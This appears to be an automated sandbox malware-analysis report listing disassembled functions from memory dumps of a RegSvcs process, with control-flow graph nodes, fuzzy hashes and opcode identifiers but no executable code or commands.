                            control_flow_graph 2731 5dde1d0-5dde1db 2732 5dde1dd-5dde204 call 5ddd59c 2731->2732 2733 5dde205-5dde224 call 5ddd5a8 2731->2733 2739 5dde22a-5dde289 2733->2739 2740 5dde226-5dde229 2733->2740 2747 5dde28f-5dde31c GlobalMemoryStatusEx 2739->2747 2748 5dde28b-5dde28e 2739->2748 2752 5dde31e-5dde324 2747->2752 2753 5dde325-5dde34d 2747->2753 2752->2753
                            Memory Dump Source
                            • Source File: 00000007.00000002.2125328985.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_5dd0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18c42517fb686ecdb06dc70f612f2c416a7eb0530eb5aa54c7fecd210c552813
                            • Instruction ID: ce1a84396e3cc95e9da1f098f107e0e24966e2103bb43b77cc35842bb816fbe3
                            • Opcode Fuzzy Hash: 18c42517fb686ecdb06dc70f612f2c416a7eb0530eb5aa54c7fecd210c552813
                            • Instruction Fuzzy Hash: 10410172E043598FCB14DFAAD8442EEFFB5EF89210F05856BD404A7241EB389985CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05DDD5A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2756 5ddd5a8-5dde31c GlobalMemoryStatusEx 2759 5dde31e-5dde324 2756->2759 2760 5dde325-5dde34d 2756->2760 2759->2760
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05DDE222), ref: 05DDE30F
                            Memory Dump Source
                            • Source File: 00000007.00000002.2125328985.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_5dd0000_RegSvcs.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID:
                            • API String ID: 1890195054-0
                            • Opcode ID: dde2f5279cd10f30d35e8b961cd2f1624ff0434c757118cba6f9037578ea228f
                            • Instruction ID: 14015d794ce32181125dc228e3065cde25ddcadb564f554563ffb88367e9ae14
                            • Opcode Fuzzy Hash: dde2f5279cd10f30d35e8b961cd2f1624ff0434c757118cba6f9037578ea228f
                            • Instruction Fuzzy Hash: 1211F2B1C006599BCB10DF9AC445AAEFBB8EF49310F10816AD918A7240D378A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DFF405 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: e0ff4f51da38b30c95623b00ca317f003bcd950aa882f3094596697fd7c443e4
                            • Instruction ID: c5751759e8156fd937430123be1848b87d9efd2ab25f828107be4540ac04d982
                            • Opcode Fuzzy Hash: e0ff4f51da38b30c95623b00ca317f003bcd950aa882f3094596697fd7c443e4
                            • Instruction Fuzzy Hash: 3431EE30B002068FDB19AF74D55066E7BB2AF88340F298539D40ADB395DE34DC4ACBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DFF418 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: c7765d3d667a0edd87ea3fef646000ea6ecffdc1c7995136a59e32e8459c8375
                            • Instruction ID: fe7b95e681ef98fa1a0f93abb60612eaf4f0fb4643163e5cfdec74b637f94d84
                            • Opcode Fuzzy Hash: c7765d3d667a0edd87ea3fef646000ea6ecffdc1c7995136a59e32e8459c8375
                            • Instruction Fuzzy Hash: F431ED30B002098FCB18AF38D55466F7BA6AF88740F298438D40ADB395EE34DC46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF6F78 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: 42643c7dde908b8e471736f887c9a37b8abcac7f35c4710e9918ba419e0ad2fa
                            • Instruction ID: 2453ed7c8824925645eb736cb630ea446699bb6d91dab800f36cba640ee67b33
                            • Opcode Fuzzy Hash: 42643c7dde908b8e471736f887c9a37b8abcac7f35c4710e9918ba419e0ad2fa
                            • Instruction Fuzzy Hash: 95313A34E102099BDB18CFA4D4406EEB7B2EF95304F25C525EA06EB680EB71AD468B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF6BA1 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: beb159e23ca530e18ef98474fd3b40a64effc84c7997fd338c1e7b67baf012dd
                            • Instruction ID: cfb503d2dd5fc495bc746a15a72036ce21b32c406a77206c99ead65b97e224e5
                            • Opcode Fuzzy Hash: beb159e23ca530e18ef98474fd3b40a64effc84c7997fd338c1e7b67baf012dd
                            • Instruction Fuzzy Hash: C511E9747092448FD716AF78D46452E7FB2EF8A300B0588EED085CB792DE355949C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF7908 Relevance: .6, Instructions: 554COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fea21c7f6f3676ee136c48a33add2b7745d46ec85d66f3b7de81a859287a098e
                            • Instruction ID: 771ce23b777cb523d810e6ac033b039db55ce5a828df302417b9146173185e59
                            • Opcode Fuzzy Hash: fea21c7f6f3676ee136c48a33add2b7745d46ec85d66f3b7de81a859287a098e
                            • Instruction Fuzzy Hash: 7F124A347002069FCB1AAF38E44566D37A6FBC5300B288A79E109CB7A5DF75DD46CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4A8D Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba6862c14ca142d089bb276f8fddd51337bdc128e488c1830358dafc2cefef57
                            • Instruction ID: 9111d46c3da05bd95f50193d2cc1f087ed09b7e93a6a7c2bfc3511e79038683d
                            • Opcode Fuzzy Hash: ba6862c14ca142d089bb276f8fddd51337bdc128e488c1830358dafc2cefef57
                            • Instruction Fuzzy Hash: 41B15F70E0020D9FDF10CFA9D9857AEBBF1AF88314F19C129D919E7254EB749885CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9364 Relevance: .2, Instructions: 242COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0ee813ea00dc0295e3dcb99beb5a8a4d14a9990ef9642914b34ecbac54b6b33
                            • Instruction ID: 06e2db48e54405d1cd5ab480f50120012f7f8643df71ebdce2e0d5bc25646d3c
                            • Opcode Fuzzy Hash: c0ee813ea00dc0295e3dcb99beb5a8a4d14a9990ef9642914b34ecbac54b6b33
                            • Instruction Fuzzy Hash: AC915E34E001089FCB19DF68D594AADBBF2EF88310F158465E905EB3A5DB71EC42CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF3E74 Relevance: .2, Instructions: 236COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58c682ee390b5fc9add486845e122c9cf442310a745e46245e7d13731d7e0677
                            • Instruction ID: 686ab594e02a345799a3d1d7128b0cb15e707c969a7b17542fc45b9035768cdc
                            • Opcode Fuzzy Hash: 58c682ee390b5fc9add486845e122c9cf442310a745e46245e7d13731d7e0677
                            • Instruction Fuzzy Hash: 45915D70E0020DDFDF10CFA8D9857AEBBF1AF88314F158129E519A7254EB749986CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4804 Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a0cb0ed04f9ee4f0c98cbf22f4420095a67a9dd8152f0050a0710c12a55e429
                            • Instruction ID: 6d23795320e44e31b13efa41c21f782344966528b479aa12e620ea4b3fdd8087
                            • Opcode Fuzzy Hash: 4a0cb0ed04f9ee4f0c98cbf22f4420095a67a9dd8152f0050a0710c12a55e429
                            • Instruction Fuzzy Hash: 83716AB0E0024D9FDB10DFA9C9817AEBBF1EF88314F15C129E519A7254EB749842CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4810 Relevance: .2, Instructions: 180COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a45e4d20e3d8069d130a5fb25914eff93256899701faca38fda340ba374d9c3
                            • Instruction ID: 2849e1b1b205128890c75117e777e8b74132c80d4d4fd19b4c5cc766bd16784c
                            • Opcode Fuzzy Hash: 6a45e4d20e3d8069d130a5fb25914eff93256899701faca38fda340ba374d9c3
                            • Instruction Fuzzy Hash: BD716CB0E0024D9FDB14DFA9C8417AEBBF2AF88314F19C129E519A7254EB749841CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF6CDD Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35424c38626edbead26f7cd80b11a5692f159757135f193b15c1c08b8673b437
                            • Instruction ID: 6080f40efd1a20bec69b520fe44986fc5eaefcb3170155961954294b66db60fe
                            • Opcode Fuzzy Hash: 35424c38626edbead26f7cd80b11a5692f159757135f193b15c1c08b8673b437
                            • Instruction Fuzzy Hash: 58513275E002188FDB14CFA9C885BADBBF1FF48304F19C029E819AB395D774A844CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF6CE8 Relevance: .1, Instructions: 132COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a76cea93e87504194ecfa98ef166e780a985494c3dbc82edf63269c235c351f
                            • Instruction ID: f7f33210d11267b43a518259c784a444863adc02d7ff7f99be61c7a7b74ed020
                            • Opcode Fuzzy Hash: 0a76cea93e87504194ecfa98ef166e780a985494c3dbc82edf63269c235c351f
                            • Instruction Fuzzy Hash: 97512475E002188FDB14CFA9C845BADBBB1FF48304F19C119E919BB395D774A844CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1123 Relevance: .1, Instructions: 123COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75cea1856fc2b8b873e7d682e83c54e4be9b0a27ea6845e211f510c467734b92
                            • Instruction ID: 5e51b53d4e10cd1bdf1b9219e8929a05fc2126ff6470214f07b1ed200e0c11e0
                            • Opcode Fuzzy Hash: 75cea1856fc2b8b873e7d682e83c54e4be9b0a27ea6845e211f510c467734b92
                            • Instruction Fuzzy Hash: 3E510C30146A438FCB0AEF28F9909563F65EBDA3043044AEDD0518B23EFBA46909DF71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1138 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91ffa5797cad3b929809cc430bd38afbde206e8392a05c0d27aeb2cd5d18a8e5
                            • Instruction ID: cff883170684d7f19eab28d434619954be5023bc8f1d7433123583a18e43fb0e
                            • Opcode Fuzzy Hash: 91ffa5797cad3b929809cc430bd38afbde206e8392a05c0d27aeb2cd5d18a8e5
                            • Instruction Fuzzy Hash: A951AB31152A438FC70AEF28F9909463F65EBDA30470449E9D0559723DEBA46909DF71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DFF2C9 Relevance: .1, Instructions: 99COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fcb119f9a47e78ccde0436c2094512c9be48647dcb0ef891ce0e2f1f86e9a987
                            • Instruction ID: f1fed5a3ca27174eb132582c9c1e1855aea9757ef9692aa620fda4d7a0dac336
                            • Opcode Fuzzy Hash: fcb119f9a47e78ccde0436c2094512c9be48647dcb0ef891ce0e2f1f86e9a987
                            • Instruction Fuzzy Hash: 4C317235E0420A9BDB09CF65D4946AEBBF2EF89300F25C529E406E7350DBB0EC46CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF26DC Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 454a670cf3ca36b86d98d4f93b5eb1fd47c49f538e81a415e2f8287d84d07a76
                            • Instruction ID: 1296620f04de91b8828a94175ca375a03dc907b09b47342538e7d57ee8cd1d64
                            • Opcode Fuzzy Hash: 454a670cf3ca36b86d98d4f93b5eb1fd47c49f538e81a415e2f8287d84d07a76
                            • Instruction Fuzzy Hash: DE41DFB0D0034D9FDB14DFA9C484AEEBFB5FF48310F258429E509AB254DB75994ACBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DFF2D8 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16a1650fc4e3d25063589e3e7908ef12ef490c0274824e7560e79ed3f9bb461f
                            • Instruction ID: 3d79d132e396f2ab7a81972fc8b22c62b528fbb5aaaaa74e0c42b8dbe5c196a3
                            • Opcode Fuzzy Hash: 16a1650fc4e3d25063589e3e7908ef12ef490c0274824e7560e79ed3f9bb461f
                            • Instruction Fuzzy Hash: 52316B34A0020A9BCB09CFA5D4946AEBBF2EF89300F15C529E946E7350DFB0AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF26E8 Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: db482a968660044222d30391509380777b69e065a78e31080f6bbed828311369
                            • Instruction ID: 5e658e6b1a519efd4e9ad1151b5f6ec666f241aa45750e856a5c75a5c86259d0
                            • Opcode Fuzzy Hash: db482a968660044222d30391509380777b69e065a78e31080f6bbed828311369
                            • Instruction Fuzzy Hash: 1941EEB0D0024C9FDB14DFA9C484AEEBFB5FF48310F248429E909AB254DB75A945CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF924F Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00f827c0320b623e8af52ea03ae88c5c0f3fa3d1034440fac098d673a2ad339d
                            • Instruction ID: cc606eb461826237eae7c091ed37c01e60e24ee60061eba2a8c601fca7373429
                            • Opcode Fuzzy Hash: 00f827c0320b623e8af52ea03ae88c5c0f3fa3d1034440fac098d673a2ad339d
                            • Instruction Fuzzy Hash: 6731A031E0020A9BDF05DFA5D4A07AEFBB2FF89300F55C51AE905EB255DB709846CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF169F Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8e681ba1496bf26322549bf7b0da9b7086701fd5ebf88f7f7ac9a2ff1a426b35
                            • Instruction ID: 58eace6b052961de530f0c08cd2297b9b44197a7f290d509187a752d2ff21417
                            • Opcode Fuzzy Hash: 8e681ba1496bf26322549bf7b0da9b7086701fd5ebf88f7f7ac9a2ff1a426b35
                            • Instruction Fuzzy Hash: F821C93C500506DFDF12EF24F844B693759EB55304F198A65D109C72A9FB74DC4ACBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9260 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 437aa67388476964962e5e3141c730f6100ba9adac1e3cd011e04a507c6375fa
                            • Instruction ID: 9880541189bf1b1eb0d48f4c300d360a4fe5507850241b44d02911057a6c7e79
                            • Opcode Fuzzy Hash: 437aa67388476964962e5e3141c730f6100ba9adac1e3cd011e04a507c6375fa
                            • Instruction Fuzzy Hash: 9C217E31E0020A9BDB05CFA5D4A07AEFBB2FF89300F55C519E905EB255DB70AC46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9150 Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4043c6dff4c72c5f1fd4feadc02faddad0e5c6a6c1c6595810e37ef364c3307
                            • Instruction ID: 5f2e872ec3fe7ea8a8f371fd6b9ae0b245f75f742f5d84e9704d851e08d5b052
                            • Opcode Fuzzy Hash: c4043c6dff4c72c5f1fd4feadc02faddad0e5c6a6c1c6595810e37ef364c3307
                            • Instruction Fuzzy Hash: BD21B230E0020A9BDB09CFA4D4947EEF7B2AF89304F25C62AE915FB340DB709946CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF4F89 Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 882792bef30e2928d2738ad7dede3432598f9de14707c5abdde54dcd61991056
                            • Instruction ID: 4ae6f4fdcf026d7fbd15ec7e449e4f7000b9d09eb6f87e87b6e27219fc28ac01
                            • Opcode Fuzzy Hash: 882792bef30e2928d2738ad7dede3432598f9de14707c5abdde54dcd61991056
                            • Instruction Fuzzy Hash: F0215C34600209CFCB14EF74D559AAE77F1EF88300B114568EA06EB3A5EF759D01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1383 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68136ee3f3d91c5b65501a33f0aff12b0e7af6b4a9d51a453c346d8562cefd51
                            • Instruction ID: e572650fc4d9cc43d86caa3a329b5b73271f052a2d442e9d2e68fc1b7b0656c8
                            • Opcode Fuzzy Hash: 68136ee3f3d91c5b65501a33f0aff12b0e7af6b4a9d51a453c346d8562cefd51
                            • Instruction Fuzzy Hash: D221A27CA4020ACFDB356728E4887393755EB93315F0D8869E60AC72D1E669DC85C7B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1878 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2dfc5ac4c7006316a72891cd027ba4a18517b454a5b507775a6522b376feb4b
                            • Instruction ID: e9971c271830ea60779842ab905cdccf1fc53a36f3405fb53070d2bd58bc67b0
                            • Opcode Fuzzy Hash: d2dfc5ac4c7006316a72891cd027ba4a18517b454a5b507775a6522b376feb4b
                            • Instruction Fuzzy Hash: D6216B34600219CFDB24EB74C6647AE77F1AF88344F254469D601EB2A1DF768D40CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9A30 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7d75ac3d6b8ee0ff4d247fcc69c805377fca8811893f39c01c971ce63e2626e5
                            • Instruction ID: 4855895691c4652946f7b0fbc704f4fcdc1e75c832d6e6cc2b6034d448313588
                            • Opcode Fuzzy Hash: 7d75ac3d6b8ee0ff4d247fcc69c805377fca8811893f39c01c971ce63e2626e5
                            • Instruction Fuzzy Hash: 72219231F102098FDB14DB69C965BAEBBF5EF88710F158065E605EB3A4DA71DD0487A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF9160 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 50dc0efbef2dc4a7d05fe0e261e05c3baf08dc1efbe936469c08f1be7c5b24b9
                            • Instruction ID: 753e745d2cb9d096a9a7e9396e4f932b5179e3fc5f0d9ebf8cabbebd1c3cb034
                            • Opcode Fuzzy Hash: 50dc0efbef2dc4a7d05fe0e261e05c3baf08dc1efbe936469c08f1be7c5b24b9
                            • Instruction Fuzzy Hash: C2218030E0020A9BCB08CFA5D8546EEF7B2AF89300F55C62AE915F7350DB70AD46CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF1888 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 437ae599039b22a29c82648ed9fd527109537ac41decbacdcf487b99d9223373
                            • Instruction ID: a47ded06a2b732b6ae5f087bdddcb4e280725e83aa0c57afc66081cf3b558f41
                            • Opcode Fuzzy Hash: 437ae599039b22a29c82648ed9fd527109537ac41decbacdcf487b99d9223373
                            • Instruction Fuzzy Hash: DE213B38B00219DFDB14EB64C6646AE77F2AB89340F254468D605EB265DF76CD40CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF16B0 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.2116972626.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_df0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51d7e016aeb3441d8bf62bf3827f4a6650650649b4314f8cf056f6b89e002a74
                            • Instruction ID: 010c4d196d5072e327754c8f07278b4b65e6bafeba63c97cbe5df8e39b8dbdfd
                            • Opcode Fuzzy Hash: 51d7e016aeb3441d8bf62bf3827f4a6650650649b4314f8cf056f6b89e002a74
                            • Instruction Fuzzy Hash: 0421C63C600506DFDF12FB28F844B693759EB45304F158A65D109C7269FBB4EC49CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DF17C0 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
